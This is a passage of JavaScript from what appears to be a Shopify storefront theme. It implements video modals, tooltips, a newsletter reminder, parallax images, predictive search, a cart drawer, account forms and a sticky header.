      var videoId = evt.currentTarget.dataset.videoId;
      var videoLoop = evt.currentTarget.dataset.videoLoop;
      vimeoPlayer = new theme.VimeoPlayer(
        videoHolderId,
        videoId,
        {
          style: 'sound',
          loop: videoLoop,
        }
      );
    }
  
    function triggerMp4Modal(evt) {
      emptyVideoHolder();
  
      var el = evt.currentTarget;
      var player = el.parentNode.querySelector(selectors.mp4Player);
  
      // Clone video element and place it in the modal
      var playerClone = player.cloneNode(true);
      playerClone.classList.remove('hide');
  
      videoHolderDiv.append(playerClone);
      modal.open(evt);
  
      // Play new video element
      videoHolderDiv.querySelector('video').play();
    }
  
    function onYoutubeReady(evt) {
      evt.target.unMute();
      evt.target.playVideo();
    }
  
    function getYoutubeVideoId(url) {
      var regExp = /^.*((youtu.be\/)|(v\/)|(\/u\/\w\/)|(embed\/)|(watch\?))\??v?=?([^#\&\?]*).*/;
      var match = url.match(regExp);
      return (match&&match[7].length==11)? match[7] : false;
    }
  
    function emptyVideoHolder() {
      videoHolderDiv.innerHTML = '';
    }
  
    function closeVideoModal() {
      if (youtubePlayer && typeof youtubePlayer.destroy === 'function') {
        youtubePlayer.destroy();
      } else if (vimeoPlayer && typeof vimeoPlayer.destroy === 'function') {
        vimeoPlayer.destroy();
      } else {
        emptyVideoHolder();
      }
    }
  };
  
  
  /*============================================================================
    ToolTip
  ==============================================================================*/
  
  class ToolTip extends HTMLElement {
    constructor() {
      super();
      this.el = this;
      this.inner = this.querySelector('[data-tool-tip-inner]');
      this.closeButton = this.querySelector('[data-tool-tip-close]');
      this.toolTipContent = this.querySelector('[data-tool-tip-content]');
      this.toolTipTitle = this.querySelector('[data-tool-tip-title]');
  
      this.triggers = document.querySelectorAll('[data-tool-tip-trigger]');
  
      document.addEventListener('tooltip:open', e => {
        this._open(e.detail.context, e.detail.content);
      });
    }
  
    _open(context, insertedHtml) {
      this.toolTipContent.innerHTML = insertedHtml;
  
      // Ensure we set a title for product availability
      if (context != 'store-availability') {
        this.toolTipTitle.remove();
      }
  
      this._lockScrolling();
  
      if (this.closeButton) {
        this.closeButton.on('click' + '.tooltip-close', () => {
          this._close();
        });
      }
  
      document.documentElement.on('click' + '.tooltip-outerclick', event => {
        if (this.el.dataset.toolTipOpen === 'true' && !this.inner.contains(event.target)) this._close();
      });
  
      document.documentElement.on('keydown' + '.tooltip-esc', event => {
        if (event.code === 'Escape') this._close();
      });
  
      this.el.dataset.toolTipOpen = true;
      this.el.dataset.toolTip = context;
    }
  
    _close() {
      this.toolTipContent.innerHTML = '';
      this.el.dataset.toolTipOpen = 'false';
      this.el.dataset.toolTip = '';
  
      this._unlockScrolling();
  
      this.closeButton.off('click' + '.tooltip-close');
      document.documentElement.off('click' + '.tooltip-outerclick');
      document.documentElement.off('keydown' + '.tooltip-esc');
    }
  
    _lockScrolling() {
      theme.a11y.trapFocus({
        container: this.el,
        namespace: 'tooltip_focus'
      });
  
      theme.a11y.lockMobileScrolling();
      document.documentElement.classList.add('modal-open');
    }
  
    _unlockScrolling() {
      theme.a11y.removeTrapFocus({
        container: this.el,
        namespace: 'tooltip_focus'
      });
  
      theme.a11y.unlockMobileScrolling();
      document.documentElement.classList.remove('modal-open');
    }
  }
  
  customElements.define('tool-tip', ToolTip);
  
  /*============================================================================
    ToolTipTrigger
  ==============================================================================*/
  
  class ToolTipTrigger extends HTMLElement {
    constructor() {
      super();
      this.el = this;
      this.toolTipContent = this.querySelector('[data-tool-tip-content]');
      this.init();
    }
  
    init() {
      const toolTipOpen = new CustomEvent('tooltip:open', {
        detail: {
          context: this.dataset.toolTip,
          content: this.toolTipContent.innerHTML
        },
        bubbles: true
      });
  
      this.el.addEventListener('click', e => {
        e.stopPropagation();
        this.dispatchEvent(toolTipOpen);
      });
    }
  }
  
  customElements.define('tool-tip-trigger', ToolTipTrigger);
  
  /*============================================================================
    NewsletterReminder
  ==============================================================================*/
  
  class NewsletterReminder extends HTMLElement {
    constructor() {
      super();
      this.closeBtn = this.querySelector('[data-close-button]');
      this.popupTrigger = this.querySelector('[data-message]');
  
      this.id = this.dataset.sectionId;
      this.newsletterId = `NewsletterPopup-${ this.id }`;
      this.cookie = Cookies.get(`newsletter-${this.id}`);
      this.cookieName = `newsletter-${this.id}`;
      this.secondsBeforeShow = this.dataset.delaySeconds;
      this.expiry = parseInt(this.dataset.delayDays);
      this.modal = new theme.Modals(`NewsletterPopup-${this.newsletterId}`, 'newsletter-popup-modal');
  
      this.init();
    }
  
    init() {
      document.addEventListener('shopify:block:select', (evt) => {
        if (evt.detail.sectionId === this.id) {
          this.show(0, true)
        }
      });
  
      document.addEventListener('shopify:block:deselect', (evt) => {
        if (evt.detail.sectionId === this.id) {
          this.hide();
        }
      });
  
      document.addEventListener(`modalOpen.${this.newsletterId}`, () => this.hide());
      document.addEventListener(`modalClose.${this.newsletterId}`, () => this.show());
      document.addEventListener(`newsletter:openReminder`, () => this.show(0));
  
      this.closeBtn.addEventListener('click', () => {
        this.hide();
        Cookies.set(this.cookieName, 'opened', { path: '/', expires: this.expiry });
      });
  
      this.popupTrigger.addEventListener('click', () => {
        const reminderOpen = new CustomEvent('reminder:openNewsletter', { bubbles: true });
        this.dispatchEvent(reminderOpen);
  
        this.hide();
      });
    }
  
    show(time = this.secondsBeforeShow, forceOpen = false) {
      const reminderAppeared = (sessionStorage.getItem('reminderAppeared') === 'true');
  
      if (!reminderAppeared) {
        setTimeout(() => {
          this.dataset.enabled = 'true';
          sessionStorage.setItem('reminderAppeared', true);
        }, time * 1000);
      }
    }
  
    hide() {
      this.dataset.enabled = 'false';
    }
  }
  
  customElements.define('newsletter-reminder', NewsletterReminder);
  
  /*============================================================================
    ParallaxImage
  ==============================================================================*/
  
  class ParallaxImage extends HTMLElement {
    constructor() {
      super();
      this.parallaxImage = this.querySelector('[data-parallax-image]');
      this.windowInnerHeight = window.innerHeight;
      this.isActive = false;
      this.timeout = null;
      this.directionMap = {
        right: 0,
        top: 90,
        left: 180,
        bottom: 270
      }
      this.directionMultipliers = {
        0: [  1,  0 ],
        90: [  0, -1 ],
        180: [ -1,  0 ],
        270: [  0,  1 ]
      }
  
      this.init();
      window.addEventListener('scroll', () => this.scrollHandler());
    }
  
    getParallaxInfo() {
      const { width, height, top } = this.parallaxImage.getBoundingClientRect();
      let element = this.parallaxImage;
      let multipliers;
      let { angle, movement } = element.dataset;
  
      let movementPixels = angle === 'top' ? Math.ceil(height * (parseFloat(movement) / 100)) : Math.ceil(width * (parseFloat(movement) / 100));
  
      // angle has shorthands "top", "left", "bottom" and "right"
      // nullish coalescing. using `||` here would fail for `0`
      angle = this.directionMap[angle] ?? parseFloat(angle);
  
      // fallback if undefined
      // NaN is the only value that doesn't equal itself
      if (angle !== angle) angle = 270; // move to bottom (default parallax effect)
      if (movementPixels !== movementPixels) movementPixels = 100; // 100px
  
      // check if angle is located in top half and/or left half
      angle %= 360;
      if (angle < 0) angle += 360
  
      const toLeft = angle > 90 && angle < 270;
      const toTop  = angle < 180;
  
      element.style[toLeft ? 'left' : 'right'] = 0;
      element.style[toTop  ? 'top' : 'bottom'] = 0;
  
      // if it's not a perfectly horizontal or vertical movement, get cos and sin
      if (angle % 90) {
        const radians = angle * Math.PI / 180
        multipliers = [ Math.cos(radians), Math.sin(radians) * -1 ] // only sin has to be inverted
      } else {
        multipliers = this.directionMultipliers[angle];
      }
  
      // increase width and height according to movement and multipliers
      if (multipliers[0]) element.style.width  = `calc(100% + ${movementPixels * Math.abs(multipliers[0])}px)`;
      if (multipliers[1]) element.style.height = `calc(100% + ${movementPixels * Math.abs(multipliers[1])}px)`;
  
      return {
        element,
        movementPixels,
        multipliers,
        top,
        height
      }
    }
  
    init() {
      const { element, movementPixels, multipliers, top, height } = this.getParallaxInfo();;
  
      const scrolledInContainer = this.windowInnerHeight - top;
      const scrollArea = this.windowInnerHeight + height;
      const progress = scrolledInContainer / scrollArea;
  
      if (progress > -0.1 && progress < 1.1) {
        const position = Math.min(Math.max(progress, 0), 1) * movementPixels;
        element.style.transform = `translate3d(${position * multipliers[0]}px, ${position * multipliers[1]}px, 0)`;
      }
  
      if (this.isActive) requestAnimationFrame(this.init.bind(this));
    }
  
    scrollHandler() {
      if (this.isActive) {
        clearTimeout(this.timeout);
      } else {
        this.isActive = true;
        requestAnimationFrame(this.init.bind(this));
      }
  
      this.timeout = setTimeout(() => this.isActive = false, 20);
    }
  }
  
  customElements.define('parallax-image', ParallaxImage);
  
  /*============================================================================
    ImageElement
  ==============================================================================*/
  
  class ImageElement extends HTMLElement {
    constructor() {
      super();
  
      this.init();
    }
  
    init() {
  
      const handleIntersection = (entries, observer) => {
        if (!entries[0].isIntersecting) return;
  
        this.removeAnimations();
  
        observer.unobserve(this);
      }
  
      // Set an IntersectionObserver to check if the image is nearly in the viewport
      new IntersectionObserver(handleIntersection.bind(this), {rootMargin: '0px 0px 400px 0px'}).observe(this);
    }
  
    removeAnimations() {
      // Find the closest image-wrap and remove the animation (fix for streamline image-wrap shimmer)
      const imageWrap = this.closest('.image-wrap');
      const skrimWrap = this.closest('.skrim__link');
  
      if (imageWrap) {
        imageWrap.classList.add('loaded');
      }
  
      if (skrimWrap) {
        skrimWrap.classList.add('loaded');
      }
    }
  }
  
  customElements.define('image-element', ImageElement);
  
  /*============================================================================
    PredictiveSearch
  ==============================================================================*/
  
  class PredictiveSearch extends HTMLElement {
    constructor() {
      super();
      this.enabled = this.getAttribute('data-enabled');
      this.context = this.getAttribute('data-context');
      this.suggestionsEnabled = this.getAttribute('data-suggestions-enabled') === 'true';
      this.input = this.querySelector('input[type="search"]');
      this.predictiveSearchResults = this.querySelector('#predictive-search');
      this.suggestionsEmptyWrapper = this.querySelector('#predictive-search-suggestions-empty-wrapper');
      this.ajaxResultsContainer = this.querySelector('#predictive-search-results-ajax');
      this.inputBg = this.querySelector('.search__input-bg');
      this.closeBtn = this.querySelector('.btn--close-search');
      this.screen = this.querySelector('[data-screen]');
      this.overlay = this.querySelector('.predictive-search__overlay');
      this.SearchModal = this.closest('#SearchModal') || null;
      this.form = this.querySelector('form');
      
      // Store last search results
      this.lastSearchTerm = '';
      this.lastResultsHTML = '';
      this.isExplicitlyClosed = false;

      if (this.form) {
        this.form.addEventListener('submit', (event) => {
          if (!this.input || !this.input.value.trim().length) {
            event.preventDefault();
            this.input.focus();
            this.handleFocus();
          }
        });
      }
  
      // Open events
      document.addEventListener('predictive-search:open', e => {
        if (e.detail.context !== this.context) return;
        this.classList.add('is-active');

        this.input.focus();
        this.handleFocus();

        setTimeout(() => {
          document.body.classList.add('predictive-overflow-hidden');
          document.documentElement.classList.add('predictive-overflow-hidden');
        }, 0);
      });
  
      // listen for class change of 'modal--is-active on this.SearchModal
      if (this.SearchModal) {
        const observer = new MutationObserver((mutations) => {
          mutations.forEach((mutation) => {
            if (mutation.attributeName === 'class') {
              const modalClass = mutation.target.className;
              if (modalClass.indexOf('modal--is-active') > -1) {
                setTimeout(() => { 
                  this.input.focus();
                  this.handleFocus();
                }, 100);
              }
            }
          });
        });
  
        observer.observe(this.SearchModal, {
          attributes: true
        });
      }
  
      if (this.enabled === 'false') return;
  
      // On typing
      this.input.addEventListener('keydown', () => { this.classList.add('is-active'); });
  
      this.input.addEventListener('input', this.debounce((event) => {
        this.onChange(event);
      }, 300).bind(this));
      
      this.input.addEventListener('focus', () => {
        setTimeout(() => {
          this.handleFocus();
        }, 0);

      });
      
      this.input.addEventListener('blur', (e) => {
      
        setTimeout(() => {
          const activeElement = document.activeElement;
          if (!this.predictiveSearchResults.contains(activeElement) && 
              activeElement !== this.input &&
              !this.isExplicitlyClosed) {
     
          }
        }, 200);
      });
  
      // Close events
      document.addEventListener('predictive-search:close', () => { this.close(true); });
      document.addEventListener('keydown', (event) => { if (event.keyCode === 27) this.close(true); });
      this.closeBtn.addEventListener('click', e => { e.preventDefault(); this.close(true); });
      this.screen.addEventListener('click', () => { this.close(true); });
      if (this.overlay) {
        this.overlay.addEventListener('click', () => { this.close(true); });
      }

      // Click outside search pane closes it (when open or focus is out)
      document.addEventListener('click', (e) => {
        if (!this.classList.contains('is-active')) return;
        if (this.contains(e.target)) return;
        this.close(true);
      });
    }
    
    handleFocus() {
      const searchTerm = this.input.value.trim();

      if (searchTerm.length > 0) {
        if (this.lastSearchTerm === searchTerm && this.lastResultsHTML) {
          // Content from the last render is already sitting in the DOM (blur only
          // hides the panel, it doesn't clear it) — just reveal it, no re-render.
          this.open();
          this.isExplicitlyClosed = false;
          return;
        }
        this.getSearchResults(searchTerm);
      } else if (this.suggestionsEnabled && this.suggestionsEmptyWrapper && this.suggestionsEmptyWrapper.firstElementChild) {
        this.showEmptyStateSuggestions();
        this.open();
        this.isExplicitlyClosed = false;
      }
    }
  
    onChange() {
      const searchTerm = this.input.value.trim();

      if (!searchTerm.length) {
        if (this.ajaxResultsContainer) this.ajaxResultsContainer.innerHTML = '';
        if (this.suggestionsEnabled && this.suggestionsEmptyWrapper && this.suggestionsEmptyWrapper.firstElementChild) {
          this.showEmptyStateSuggestions();
          this.open();
          this.isExplicitlyClosed = false;
        } else {
          this.predictiveSearchResults.style.display = 'none';
          if (this.inputBg) this.inputBg.classList.remove('search__input-bg--active');
          this.classList.remove('is-active');
        }
        this.lastSearchTerm = '';
        this.lastResultsHTML = '';
        return;
      }

      this.getSearchResults(searchTerm);
    }
  
    getSearchResults(searchTerm) {
      // Paint the open panel immediately — before the fetch even goes out — so the
      // visible response to this interaction doesn't wait on the network round-trip
      // or the render/image work that follows (keeps that work off the INP path).
      this.open();
      this.isExplicitlyClosed = false;

      const searchObj = {
        'q': searchTerm,
        'resources[type]': 'product,query',
        'resources[limit]': 6,
        'resources[limit_scope]': 'each',
        'resources[options][unavailable_products]': 'last'
      };

      const params = this.paramUrl(searchObj);

      fetch(`${theme.routes.predictiveSearch}?${params}&section_id=search-results`)
        .then((response) => {
          if (!response.ok) {
            const error = new Error(response.status);
            this.close(true);
            throw error;
          }

          return response.text();
        })
        .then((text) => {
          const searchTerm = this.input.value.trim();
          if (!searchTerm.length) {
            this.close(true);
            return;
          }

          const resultsMarkup = new DOMParser().parseFromString(text, 'text/html').querySelector('#shopify-section-search-results').innerHTML;
          if (this.ajaxResultsContainer) {
            this.ajaxResultsContainer.innerHTML = resultsMarkup;
            this.showAjaxResults();
          } else {
            this.predictiveSearchResults.innerHTML = resultsMarkup;
          }

          this.lastSearchTerm = searchTerm;
          this.lastResultsHTML = resultsMarkup;
        })
        .catch((error) => {
          this.close(true);
          throw error;
        });
    }
  
    showEmptyStateSuggestions() {
      if (this.suggestionsEmptyWrapper) this.suggestionsEmptyWrapper.style.display = '';
      if (this.ajaxResultsContainer) this.ajaxResultsContainer.style.display = 'none';
    }

    showAjaxResults() {
      if (this.suggestionsEmptyWrapper) this.suggestionsEmptyWrapper.style.display = 'none';
      if (this.ajaxResultsContainer) this.ajaxResultsContainer.style.display = 'block';
    }

    open() {
      // A pending close() from a rapid close-then-reopen would otherwise still
      // fire after this and undo it — hide the panel again, and if that close
      // was explicit, wipe the input/results this open() just restored.
      clearTimeout(this._closeTimer);

      // Visible state change stays synchronous (3 trivial property writes, no
      // forced reflow) so the panel paints without lagging the overlay.
      this.predictiveSearchResults.style.display = 'block';
      if (this.inputBg) this.inputBg.classList.add('search__input-bg--active');
      this.classList.add('is-active');

      // Nothing below has a visible effect of its own, so it doesn't need to sit
      // on this interaction's processing time — same fix as close().
      setTimeout(() => {
        document.body.classList.add('predictive-overflow-hidden');
        document.documentElement.classList.add('predictive-overflow-hidden');
      }, 0);
        // Desktop's close button is positioned/shown only via this class (see
        // header.liquid), regardless of which instance (desktop or mobile)
        // opened — close() already clears .active from every close button.
        const desktopCloseBtn = document.querySelector('.desktop-only .btn--close-search');
        if (desktopCloseBtn) desktopCloseBtn.classList.add('active');

    }

    close(explicitClose = false) {
      this.isExplicitlyClosed = explicitClose;

      // Clear any previously scheduled close so a rapid double-close only
      // runs the latest one (with its own explicitClose value), not both.
      clearTimeout(this._closeTimer);

      this._closeTimer = setTimeout(() => {
        this.predictiveSearchResults.style.display = 'none';
        if (this.inputBg) this.inputBg.classList.remove('search__input-bg--active');
        this.classList.remove('is-active');

        if (explicitClose) {
          // Full reset: clear query, results DOM, and cache (X, ESC, overlay, etc.)
          if (this.input) {
            this.input.value = '';
            this.input.setAttribute('aria-expanded', 'false');
            this.input.blur();
          }
          if (this.ajaxResultsContainer) {
            this.ajaxResultsContainer.innerHTML = '';
          }
          if (this.suggestionsEmptyWrapper) {
            this.suggestionsEmptyWrapper.style.display = 'none';
          }
          this.lastSearchTerm = '';
          this.lastResultsHTML = '';
          // Header script may set .active on another instance's close button (e.g. mobile focus → desktop X)
          document.querySelectorAll('.btn--close-search.active').forEach((btn) => btn.classList.remove('active'));
        }

        document.body.classList.remove('predictive-overflow-hidden');
        document.documentElement.classList.remove('predictive-overflow-hidden');

        const event = new CustomEvent('predictive-search:close-all', {
          detail: { element: null }
        });
        document.dispatchEvent(event);
      }, 0);
    }

    debounce(fn, wait) {
      let t;
      return (...args) => {
        clearTimeout(t);
        t = setTimeout(() => fn.apply(this, args), wait);
      };
    }
  
    paramUrl(obj) {
      return Object.keys(obj).map(function(key) {
        return key + '=' + encodeURIComponent(obj[key]);
      }).join('&')
    }
  }
  
  customElements.define('predictive-search', PredictiveSearch);
  
  class RecipientForm extends HTMLElement {
    constructor() {
      super();
      this.checkboxInput = this.querySelector(`#Recipient-Checkbox-${ this.dataset.sectionId }`);
      this.emailInput = this.querySelector(`#Recipient-email-${ this.dataset.sectionId }`);
      this.nameInput = this.querySelector(`#Recipient-name-${ this.dataset.sectionId }`);
      this.messageInput = this.querySelector(`#Recipient-message-${ this.dataset.sectionId }`);
      this.addEventListener('change', () => this.onChange());
      this.recipientFields = this.querySelector('.recipient-fields');
  
      this.checkboxInput.addEventListener('change', () => {
        this.recipientFields.style.display = this.checkboxInput.checked ? 'block' : 'none';
      });
    }
  
    connectedCallback() {
      document.addEventListener('ajaxProduct:error', (event) => {
        const productVariantID = event.target.querySelector('[name="id"]').value;
        if (productVariantID === this.dataset.productVariantId) {
          this.displayErrorMessage(event.detail.errorMessage);
        }
      });
  
      document.addEventListener('ajaxProduct:added', (event) => {
        const productVariantID = event.target.querySelector('[name="id"]').value;
        if (productVariantID === this.dataset.productVariantId) {
          this.clearInputFields();
          this.clearErrorMessage();
        }
      });
    }
  
    onChange() {
      if (!this.checkboxInput.checked) {
        this.clearInputFields();
        this.clearErrorMessage();
      }
    }
  
    clearInputFields() {
      this.querySelectorAll('.field__input').forEach(el => el.value = '');
    }
  
    displayErrorMessage(body) {
      this.clearErrorMessage();
      if (body) {
        return Object.entries(body).forEach(([key, value]) => {
          const inputElement = this[`${key}Input`];
          if (!inputElement) return;
  
          inputElement.setAttribute('aria-invalid', true);
          inputElement.classList.add('field__input--error');
        });
      }
    }
  
    clearErrorMessage() {
      this.querySelectorAll('.field__input').forEach(inputElement => {
        inputElement.setAttribute('aria-invalid', false);
        inputElement.removeAttribute('aria-describedby');
        inputElement.classList.remove('field__input--error');
      });
    }
  };
  
  customElements.define('recipient-form', RecipientForm);
  

  theme.announcementBar = (function() {
    var selectors = {
      bar: '.announcement',
      text: '.announcement__text',
      closeBtn: '.announcement__close'
    };
  
    var classes = {
      opening: 'announcement--opening',
      closed: 'announcement--closed'
    };
  
    var config = {
      namespace: '.announcementBar'
    };
  
    function init() {
      // If no close button, no JS needed
      if (!document.querySelector(selectors.closeBtn)) {
        return;
      }
  
      if (theme.config.hasSessionStorage && sessionStorage[announcementBarText()] !== 'hidden') {
        window.setTimeout(function() {
          announcementBarShow();
        }, 2000);
      }
  
      // Probably in the editor, so show it anyway
      if (!theme.config.hasSessionStorage) {
        window.setTimeout(function() {
          announcementBarShow();
        }, 2000);
      }
  
      document.querySelector(selectors.closeBtn).addEventListener('click', announcementBarClose);
  
      window.on('resize' + config.namespace, theme.utils.debounce(500, announcementBarHeight));
    }
  
    function unload() {
      window.off('resize' + config.namespace);
    }
  
    function announcementBarShow() {
      document.querySelector(selectors.bar).classList.remove(classes.closed);
      announcementBarHeight();
    }
  
    function announcementBarHeight() {
      var barHeight = document.querySelector(selectors.text).clientHeight;
      document.querySelector(selectors.bar).classList.add(classes.opening);
      document.querySelector(selectors.bar).style.maxHeight = barHeight + 'px';
      requestAnimationFrame(function() {
        if (theme.updateHeaderAndAnnouncementBarHeight) {
          theme.updateHeaderAndAnnouncementBarHeight();
        }
      });
    }

    function announcementBarClose() {
      if (theme.config.hasSessionStorage) {
        sessionStorage.setItem(announcementBarText(), 'hidden');
      }

      document.querySelector(selectors.bar).classList.add(classes.closed);
      setTimeout(function() {
        if (theme.updateHeaderAndAnnouncementBarHeight) {
          theme.updateHeaderAndAnnouncementBarHeight();
        }
      }, 350);
    }
  
    function announcementBarText() {
      return document.querySelector(selectors.text).dataset.text;
    }
  
    return {
      init: init,
      unload: unload
    };
  })();
  
  theme.articleImages = function() {
    var wrappers = document.querySelectorAll('.rte--indented-images');
  
    if (!wrappers.length) {
      return;
    }
  
    wrappers.forEach(wrapper => {
      wrapper.querySelectorAll('img').forEach(image => {
        var attr = image.getAttribute('style');
        // Check if undefined for float: none
        if (!attr || attr == 'float: none;') {
          // Remove grid-breaking styles if image is not wider than parent
          if (image.width < wrapper.offsetWidth) {
            image.classList.add('rte__no-indent');
          }
        }
      });
    });
  };
  
  theme.CartDrawer = (function() {
    var selectors = {
      drawer: '#CartDrawer',
      form: '#CartDrawerForm'
    };
  
    function CartDrawer() {
      this.form = document.querySelector(selectors.form);
      this.drawer = new theme.Drawers('CartDrawer', 'cart');
  
      this.init();
    }
  
    CartDrawer.prototype = Object.assign({}, CartDrawer.prototype, {
      destroy: function() {
        if (this._cartHandlers) {
          document.removeEventListener('ajaxProduct:added', this._cartHandlers.ajaxAdded);
          document.removeEventListener('cart:open', this._cartHandlers.cartOpen);
          document.removeEventListener('cart:close', this._cartHandlers.cartClose);
          this._cartHandlers = null;
        }
        if (this.drawer && typeof this.drawer.destroy === 'function') {
          this.drawer.destroy();
        }
        this.drawer = null;
      },

      init: function() {
        var self = this;
        this._cartHandlers = {
          ajaxAdded: function() {
            self.cartForm.buildCart();
            self.open();
          },
          cartOpen: function() {
            self.open();
          },
          cartClose: function() {
            self.close();
          }
        };

        this.cartForm = new theme.CartForm(this.form);
        this.cartForm.buildCart();

        document.addEventListener('ajaxProduct:added', this._cartHandlers.ajaxAdded);
        document.addEventListener('cart:open', this._cartHandlers.cartOpen);
        document.addEventListener('cart:close', this._cartHandlers.cartClose);
      },
  
      open: function() {
        this.drawer.open();
      },

      close: function() {
        this.drawer.close();
      }
    });
  
    return CartDrawer;
  })();
  
  theme.customerTemplates = function() {
    checkUrlHash();
    initEventListeners();
    resetPasswordSuccess();
    customerAddressForm();
  
    function checkUrlHash() {
      var hash = window.location.hash;
  
      // Allow deep linking to recover password form
      if (hash === '#recover') {
        toggleRecoverPasswordForm();
      }
    }
  
    function toggleRecoverPasswordForm() {
      var passwordForm = document.getElementById('RecoverPasswordForm').classList.toggle('hide');
      var loginForm = document.getElementById('CustomerLoginForm').classList.toggle('hide');
    }
  
    function initEventListeners() {
      // Show reset password form
      var recoverForm = document.getElementById('RecoverPassword');
      if (recoverForm) {
        recoverForm.addEventListener('click', function(evt) {
          evt.preventDefault();
          toggleRecoverPasswordForm();
        });
      }
  
      // Hide reset password form
      var hideRecoverPassword = document.getElementById('HideRecoverPasswordLink');
      if (hideRecoverPassword) {
        hideRecoverPassword.addEventListener('click', function(evt) {
          evt.preventDefault();
          toggleRecoverPasswordForm();
        });
      }
    }
  
    function resetPasswordSuccess() {
      var formState = document.querySelector('.reset-password-success');
  
      // check if reset password form was successfully submitted
      if (!formState) {
        return;
      }
  
      // show success message
      document.getElementById('ResetSuccess').classList.remove('hide');
    }
  
    function customerAddressForm() {
      var newAddressForm = document.getElementById('AddressNewForm');
      var addressForms = document.querySelectorAll('.js-address-form');
  
      if (!newAddressForm || !addressForms.length) {
        return;
      }
  
      // Country/province selector can take a short time to load
      setTimeout(function() {
        document.querySelectorAll('.js-address-country').forEach(el => {
          var countryId = el.dataset.countryId;
          var provinceId = el.dataset.provinceId;
          var provinceContainerId = el.dataset.provinceContainerId;
  
          new Shopify.CountryProvinceSelector(
            countryId,
            provinceId,
            {
              hideElement: provinceContainerId
            }
          );
        });
      }, 1000);
  
      // Toggle new/edit address forms
      document.querySelectorAll('.address-new-toggle').forEach(el => {
        el.addEventListener('click', function() {
          newAddressForm.classList.toggle('hide');
        });
      });
  
      document.querySelectorAll('.address-edit-toggle').forEach(el => {
        el.addEventListener('click', function(evt) {
          var formId = evt.currentTarget.dataset.formId;
          document.getElementById('EditAddress_' + formId).classList.toggle('hide');
        });
      });
  
      document.querySelectorAll('.address-delete').forEach(el => {
        el.addEventListener('click', function(evt) {
          var formId = evt.currentTarget.dataset.formId;
          var confirmMessage = evt.currentTarget.dataset.confirmMessage;
  
          if (confirm(confirmMessage || 'Are you sure you wish to delete this address?')) {
            if (Shopify) {
              Shopify.postLink('/account/addresses/' + formId, {parameters: {_method: 'delete'}});
            }
          }
        })
      });
    }
  };
  
  theme.headerNav = (function() {
    var selectors = {
      wrapper: '#HeaderWrapper',
      siteHeader: '#SiteHeader',
      searchBtn: '.js-search-header',
      closeSearch: '#SearchClose',
      searchContainer: '.site-header__search-container',
      logo: '#LogoContainer img',
      navItems: '.site-nav__item',
      navLinks: '.site-nav__link',
      navDropdown: '.site-nav__dropdown',
      navLinksWithDropdown: '.site-nav__link--has-dropdown',
      navDropdownLinks: '.site-nav__dropdown-link--second-level',
      navDetails: '.site-nav__details',
    };
  
    var classes = {
      hasDropdownClass: 'site-nav--has-dropdown',
      hasSubDropdownClass: 'site-nav__deep-dropdown-trigger',
      dropdownActive: 'is-focused'
    };
  
    var config = {
      namespace: '.siteNav',
      wrapperOverlayed: false,
      overlayedClass: 'is-light',
      overlayEnabledClass: 'header-wrapper--overlay',
      stickyEnabled: false,
      stickyActive: false,
      naturalHeaderHeight: 0,
      stickyClass: 'site-header--stuck',
      stickyHeaderWrapper: 'StickyHeaderWrap',
      openTransitionClass: 'site-header--opening',
      lastScroll: 0,
      stickyScrollThreshold: 0
    };
  
    // Elements used in resize functions, defined in init
    var wrapper;
    var siteHeader;
  
    function updateHeaderAndAnnouncementBarHeight() {
      var announcementBar = document.querySelector('.announcement');
      var headerEl = document.querySelector(selectors.siteHeader);
      var annHeight = (announcementBar && !announcementBar.classList.contains('announcement--closed')) ? announcementBar.offsetHeight : 0;
      var headerHeight = headerEl ? headerEl.offsetHeight : 0;
      var total = annHeight + headerHeight + 36;
      document.documentElement.style.setProperty('--headerAndAnnoucementbarheight', total + 'px');
    }

    function init() {
      wrapper = document.querySelector(selectors.wrapper);
      siteHeader = document.querySelector(selectors.siteHeader);

      config.stickyEnabled = (siteHeader && siteHeader.dataset.sticky === 'true');
      if (config.stickyEnabled) {
        config.wrapperOverlayed = wrapper.classList.contains(config.overlayedClass);
        stickyHeader();
      }

      if (siteHeader) {
        theme.settings.overlayHeader = (siteHeader.dataset.overlay === 'true');
        // Disable overlay header if on collection template with no collection image
        if (theme.settings.overlayHeader && Shopify && Shopify.designMode) {
          if (document.body.classList.contains('template-collection') && !document.querySelector('.collection-hero')) {
            this.disableOverlayHeader();
          }
        }
      }

      menuDetailsHandler();
      searchDrawer();

      updateHeaderAndAnnouncementBarHeight();
      window.on('resize' + config.namespace, theme.utils.debounce(100, updateHeaderAndAnnouncementBarHeight));

      theme.updateHeaderAndAnnouncementBarHeight = updateHeaderAndAnnouncementBarHeight;
    }
  
    // If the header setting to overlay the menu on the collection image
    // is enabled but the collection setting is disabled, we need to undo
    // the init of the sticky nav
    function disableOverlayHeader() {
      wrapper.classList.remove(config.overlayEnabledClass);
      wrapper.classList.remove(config.overlayedClass);
      config.wrapperOverlayed = false;
    }
  
    function stickyHeader() {
      config.lastScroll = 0;
  
      var wrapWith = document.createElement('div');
      wrapWith.id = config.stickyHeaderWrapper;
      theme.utils.wrap(siteHeader, wrapWith);
  
      stickyHeaderInitialPosition(siteHeader);
      stickyHeaderHeight();
      cacheStickyScrollThreshold();

      window.on('resize' + config.namespace, theme.utils.debounce(50, function() {
        stickyHeaderHeight();
        cacheStickyScrollThreshold();
      }));
      window.on('scroll' + config.namespace, theme.utils.throttle(20, stickyHeaderScroll));
  
      // This gets messed up in the editor, so here's a fix
      if (Shopify && Shopify.designMode) {
        setTimeout(function() {
          stickyHeaderHeight();
        }, 250);
      }
    }
  
    function stickyHeaderInitialPosition(header) {
      const headerParent = header.closest('.shopify-section-group-header-group');
      const parentNextSibling = headerParent.nextElementSibling;
  
      // if parentNextSibling has same class as headerParent, then header is above announcement bar
      if (parentNextSibling && parentNextSibling.classList.contains('shopify-section-group-header-group')) {
        // get height of announcement bar and set header wrapper top to that value
        const nextSiblingHeight = parentNextSibling.offsetHeight;
        document.querySelector(selectors.wrapper).style.top = nextSiblingHeight + 'px';
      }
    }
  
    function cacheNaturalHeaderHeight() {
      if (!siteHeader || config.stickyActive) {
        return;
      }

      config.naturalHeaderHeight = siteHeader.offsetHeight;
      document.documentElement.style.setProperty('--header-natural-height', config.naturalHeaderHeight + 'px');
    }

    function stickyHeaderHeight() {
      if (!config.stickyEnabled) {
        return;
      }

      var stickyWrap = document.getElementById(config.stickyHeaderWrapper);
      if (!stickyWrap || !siteHeader) {
        return;
      }

      if (!config.stickyActive) {
        cacheNaturalHeaderHeight();
      }

      // While stuck the header shrinks (mobile search hidden, less padding).
      // Keep the placeholder at the full pre-sticky height so iOS Safari
      // does not collapse layout and jump the scroll position.
      var height = config.stickyActive && config.naturalHeaderHeight
